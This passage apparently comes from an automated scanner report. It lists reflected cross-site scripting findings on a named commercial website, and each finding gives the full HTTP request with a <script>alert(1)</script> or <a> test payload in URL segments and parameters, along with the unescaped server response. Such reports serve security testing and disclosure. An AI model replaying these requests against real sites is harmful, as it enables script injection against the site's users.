<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes14aeb<script>alert(1)</script>5368a52ef70/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2700. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eb4b1<script>alert(1)</script>014900b49ca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmoseb4b1<script>alert(1)</script>014900b49ca/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmoseb4b1<script>alert(1)</script>014900b49ca/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2701. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload df053<script>alert(1)</script>6c8aaf55634 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/imagesdf053<script>alert(1)</script>6c8aaf55634/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/imagesdf053<script>alert(1)</script>6c8aaf55634/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2702. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 277cd<script>alert(1)</script>ef56d56f8b3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/search.php277cd<script>alert(1)</script>ef56d56f8b3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php277cd<script>alert(1)</script>ef56d56f8b3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2703. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4068a<a>43b7004a54c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4068a<a>43b7004a54c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4068a<a>43b7004a54c&opt=2 was not found on this server.</p>
...[SNIP]...

2.2704. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f53a6<a>170e93f60e4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...f53a6<a>170e93f60e4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php?keyword=search...f53a6<a>170e93f60e4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2705. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 44910<script>alert(1)</script>8ed64770685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&44910<script>alert(1)</script>8ed64770685=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&44910<script>alert(1)</script>8ed64770685=1 was not found on this server.</p>
...[SNIP]...

2.2706. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 87dc0<a>d038432238f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=287dc0<a>d038432238f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=287dc0<a>d038432238f was not found on this server.</p>
...[SNIP]...

2.2707. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1136<script>alert(1)</script>9d698537923 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc1136<script>alert(1)</script>9d698537923/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc1136<script>alert(1)</script>9d698537923/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2708. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a12cd<script>alert(1)</script>851759873ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39a12cd<script>alert(1)</script>851759873ee/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39a12cd<script>alert(1)</script>851759873ee/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2709. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b32c<script>alert(1)</script>2310031afc7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes5b32c<script>alert(1)</script>2310031afc7/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes5b32c<script>alert(1)</script>2310031afc7/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2710. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fdad5<script>alert(1)</script>0f2c953672d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmosfdad5<script>alert(1)</script>0f2c953672d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmosfdad5<script>alert(1)</script>0f2c953672d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2711. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1b4c0<script>alert(1)</script>b5eb68fe310 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/search.php1b4c0<script>alert(1)</script>b5eb68fe310?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php1b4c0<script>alert(1)</script>b5eb68fe310?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2712. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 842b0<a>9b66c5eed84 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search842b0<a>9b66c5eed84&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search842b0<a>9b66c5eed84&opt=2 was not found on this server.</p>
...[SNIP]...

2.2713. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d300b<a>803eff7eab0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...d300b<a>803eff7eab0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php?keyword=search...d300b<a>803eff7eab0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2714. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67156<script>alert(1)</script>a64337dcb47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&67156<script>alert(1)</script>a64337dcb47=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&67156<script>alert(1)</script>a64337dcb47=1 was not found on this server.</p>
...[SNIP]...

2.2715. http://www.resellerbase.com/detail/39/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 369df<a>ae2faa7ccaa was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2369df<a>ae2faa7ccaa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2369df<a>ae2faa7ccaa was not found on this server.</p>
...[SNIP]...

2.2716. http://www.resellerbase.com/detail/39/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 620e0<script>alert(1)</script>e566132327 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail620e0<script>alert(1)</script>e566132327/39/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail620e0<script>alert(1)</script>e566132327/39/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2717. http://www.resellerbase.com/detail/39/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1cfa5<script>alert(1)</script>f9e95d2203c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/391cfa5<script>alert(1)</script>f9e95d2203c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
